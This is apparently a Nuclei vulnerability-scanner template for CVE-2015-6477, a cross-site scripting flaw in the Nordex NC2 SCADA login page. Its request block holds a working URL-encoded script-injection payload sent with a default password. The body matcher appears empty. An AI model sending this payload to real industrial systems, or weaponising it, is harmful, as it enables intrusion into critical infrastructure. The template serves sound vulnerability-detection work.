id: CVE-2015-6477 info: name: Nordex NC2 - Cross-Site Scripting author: geeknik severity: medium description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://seclists.org/fulldisclosure/2015/Dec/117 - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 - https://nvd.nist.gov/vuln/detail/CVE-2015-6477 - http://packetstormsecurity.com/files/135068/Nordex-Control-2-NC2-SCADA-16-Cross-Site-Scripting.html - http://seclists.org/fulldisclosure/2015/Dec/117 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-6477 cwe-id: CWE-79 epss-score: 0.00294 epss-percentile: 0.65789 cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nordex product: nordex_control_2_scada tags: seclists,packetstorm,xss,iot,nordex,nc2,cve,cve2015 http: - method: POST path: - "{{BaseURL}}/login" body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en' matchers-condition: and matchers: - type: word part: header words: - "text/html" - type: word part: body words: - "" # digest: 4b0a00483046022100f3f7b9f6ff0b6ca0a5a1ff755ddf29efa0b4c25b5263e83e11fbe4a134f14ec10221009383e0e330fda92d4b62c543179446c56ae72ba2a9945ab4165f18776634dad6:922c64590222798bb761d5b6d8e72950